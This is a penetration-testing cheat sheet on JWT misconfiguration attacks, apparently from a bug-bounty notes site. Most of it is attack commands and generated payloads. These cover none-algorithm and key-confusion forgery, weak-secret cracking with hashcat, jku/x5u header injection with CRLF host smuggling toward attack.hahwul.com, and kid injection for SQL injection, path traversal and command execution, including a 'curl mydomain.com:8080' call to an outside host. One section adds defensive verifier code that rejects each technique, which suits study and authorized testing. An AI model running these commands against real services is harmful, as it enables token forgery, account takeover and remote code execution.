JWT Token
JWT misconfiguration and attacks


Useful Burp Extensions


Entropy

Start Live Capture

Viewing the token
python3 jwt_tool.py <<JWT_TOKEN>>
Tampering with the token
python3 jwt_tool.py <<JWT_TOKEN>> -T
Known HMAC secrets or RSA private keys
Checks JWTs for known HMAC secrets or RSA private keys
JWT Null Signature
Java JDKs 15 to 18 allow signature checks to be bypassed
jwtxpl <token> -a hs256 -p <key>:<value> -n
Signature not verified
jwtXploiter
jwtxpl <token> -a hs256 -p <key>:<value> --unverified
jwt-pwn - unsigned JWT
python3 jwt-mimicker.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4"
[#] Generated unsigned JWT:
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJqd3QiOiJwd24ifQ.
None algorithm attack – CVE-2015-9235
python3 jwt_tool.py <<JWT_TOKEN>> -X a
Also Try with JWTweak
RS256 to HS256 Key Confusion Attack – CVE-2016-5431
python3 jwt_tool.py <<JWT_TOKEN>> -X k -pk <<PUBKEY.PEM>>
Also Try with JWTweak - Change to multiple Algorithms
python jwtcat.py vulnerable -e "ey<TOKEN>"
Crack Weak Signing Key - HS256, HS384 & HS512
python3 jwt_tool.py <<JWT_TOKEN>> -C -d <<DICT_FILE>>
HS256
hashcat -m 16500 /tmp/jwt.hash /path/to/wordlist.txt
Small list
Big list
Get Key From SSL Certs
Sometimes JWTs are signed with the private key of the server's SSL certificate. With the --auto-try option, which takes the server domain as its argument, the tool fetches the server's SSL certificate and extracts the public key from it.
jwtxpl <token> -a hs256 -p <key>:<value> --auto-try <domain>
Multiple Payloads
jwt-hack payload eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.5m9zFPGPU0LMdTTLCR7jXMP8357nNAa0z8ABJJE3r3c --jwk-attack attack.hahwul.com --jwk-protocol https --jwk-trust trust.hahwul.com
INFO[0000] Generate none payload header="{\"alg\":\"none\",\"typ\":\"JWT\"}" payload=none
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate NonE payload header="{\"alg\":\"NonE\",\"typ\":\"JWT\"}" payload=NonE
eyJhbGciOiJOb25FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate NONE payload header="{\"alg\":\"NONE\",\"typ\":\"JWT\"}" payload=NONE
eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate jku + basic payload header="{\"alg\":\"hs256\",\"jku\":\"attack.hahwul.com\",\"typ\":\"JWT\"}" payload=jku
eyJhbGciOiJoczI1NiIsImprdSI6ImF0dGFjay5oYWh3dWwuY29tIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate jku host validation payload header="{\"alg\":\"hs256\",\"jku\":\"https://trust.hahwul.comZattack.hahwul.com\",\"typ\":\"JWT\"}" payload=jku
eyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbVphdHRhY2suaGFod3VsLmNvbSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate jku host validation payload header="{\"alg\":\"hs256\",\"jku\":\"https://trust.hahwul.com@attack.hahwul.com\",\"typ\":\"JWT\"}" payload=jku
eyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbUBhdHRhY2suaGFod3VsLmNvbSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate jku host header injection (w/CRLF) payload header="{\"alg\":\"hs256\",\"jku\":\"https://trust.hahwul.com%0d0aHost: attack.hahwul.com\",\"typ\":\"JWT\"}" payload=jku
eyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbSUwZDBhSG9zdDogYXR0YWNrLmhhaHd1bC5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate x5u + basic payload header="{\"alg\":\"hs256\",\"x5u\":\"attack.hahwul.com\",\"typ\":\"JWT\"}" payload=x5u
eyJhbGciOiJoczI1NiIsIng1dSI6ImF0dGFjay5oYWh3dWwuY29tIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate x5u host validation payload header="{\"alg\":\"hs256\",\"x5u\":\"https://trust.hahwul.comZattack.hahwul.com\",\"typ\":\"JWT\"}" payload=x5u
eyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbVphdHRhY2suaGFod3VsLmNvbSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate x5u host validation payload header="{\"alg\":\"hs256\",\"x5u\":\"https://trust.hahwul.com@attack.hahwul.com\",\"typ\":\"JWT\"}" payload=x5u
eyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbUBhdHRhY2suaGFod3VsLmNvbSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate x5u host header injection (w/CRLF) payload header="{\"alg\":\"hs256\",\"x5u\":\"https://trust.hahwul.com%0d0aHost: attack.hahwul.com\",\"typ\":\"JWT\"}" payload=x5u
eyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbSUwZDBhSG9zdDogYXR0YWNrLmhhaHd1bC5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
JWK Header Injection
JKU header injection
Kid Attacks
jwtxpl <token> -a hs256 -p <key>:<value> --inject-kid sqli
jwtxpl <token> -a hs256 -p <key>:<value> --inject-kid dirtrv
jwtxpl <token> -a hs256 --inject-kid rce
jwtxpl <token> -a hs256 --exec-via-kid "curl mydomain.com:8080"
Kid injection - Path Traversal
jwt_tool.py eyJ0<-SNIP->6tsXW4w -I -hc kid -hv '/dev/null' -pc premium -pv true -S hs512
-I: injection mode
-pc field: Field (in the payload) to modify
-pv new_value: Sets the new value of the field
-S: Signature algorithm
https://www.youtube.com/watch?v=78FIFrOi4Os
Kid Out of Band
Forge Signed Tokens
SignSaboteur - Burp Extension
All tests
JWTLens
JWTools
jwt_tool.py -t http://example/api/nmap -rh "Header-JWT: eyJ0<-SNIP->zw6tsXW4w" -rh "accept: application/json" -rh "Content-Type: application/json" -pd "[ \"1.1.1.1\", \"4.4.4.4\"]" -M pb -np
-t: target
-rh: Headers
-pd: Payload Data (in this example IP addresses)
-M pb: Playbook scan
-np: no pause
jwt_tool -t http://target-name.com/ -rh "Authorization: Bearer JWT_Token" -M pb
python3 jwt_tool.py -M at \
-t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" \
-rh "Authorization: Bearer eyJhbG...<JWT Token>"
-M at: All Tests
python3 jwt_tool.py -M at -t "https://api.example.com/api/v1/profile" -rh "Authorization: Bearer <JWT Token>"
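Defensive counterpart to the checks listed on this page (alg none variants, unverified signatures, jku/x5u/jwk header injection, kid path traversal): a strict HS256 verifier that rejects each of them. This is an added example, not code from any of the tools above; the key store, the kid "key-2024" and the function names are assumptions made for illustration.

```python
import base64, hashlib, hmac, json

# Constructed demo key store: tokens are matched to keys by exact kid only.
KEYS = {"key-2024": b"constructed-demo-secret-not-for-production"}
ALLOWED_ALG = "HS256"                      # pinned server-side, never taken from the token
KEY_LOCATION_HEADERS = {"jku", "x5u", "jwk", "x5c"}

def b64url_decode(part: str) -> bytes:
    if "=" in part:                        # compact JWTs carry no padding
        raise ValueError("padding not allowed")
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def sign(header: dict, claims: dict, key: bytes) -> str:
    """Build an HS256 token (used here only to create test input)."""
    body = ".".join(b64url_encode(json.dumps(p).encode()) for p in (header, claims))
    mac = hmac.new(key, body.encode(), hashlib.sha256).digest()
    return body + "." + b64url_encode(mac)

def verify(token: str) -> dict:
    """Return the claims, or raise ValueError with the rejection reason."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        raise ValueError("malformed or unsigned token")
    header = json.loads(b64url_decode(parts[0]))
    if not isinstance(header, dict) or header.get("alg") != ALLOWED_ALG:
        raise ValueError("algorithm not allowed")   # exact match: none/NonE/hs256 fail
    if KEY_LOCATION_HEADERS & header.keys():
        raise ValueError("key-location header rejected")
    kid = header.get("kid")
    key = KEYS.get(kid) if isinstance(kid, str) else None
    if key is None:                        # kid is a dictionary key, never a path or query
        raise ValueError("unknown kid")
    expected = hmac.new(key, f"{parts[0]}.{parts[1]}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(parts[2])):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(parts[1]))

def check(token: str) -> str:
    """Return "ok" or the reason the token was rejected."""
    try:
        verify(token)
        return "ok"
    except ValueError as exc:
        return str(exc)
```

Running the jwt_tool playbook against a service that verifies tokens this way should report no accepted forgeries; any accepted variant points to the check that is missing.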
Tools
JWTtool
jwtXploiter - jwtxpl
JWTcat
jwt-pwn
jwt-hack
JWTweak
Confusional
Resources
Interesting Books
The Web Application Hacker’s Handbook: The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more.
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities: Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them.
Real-World Bug Hunting: A Field Guide to Web Hacking: Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.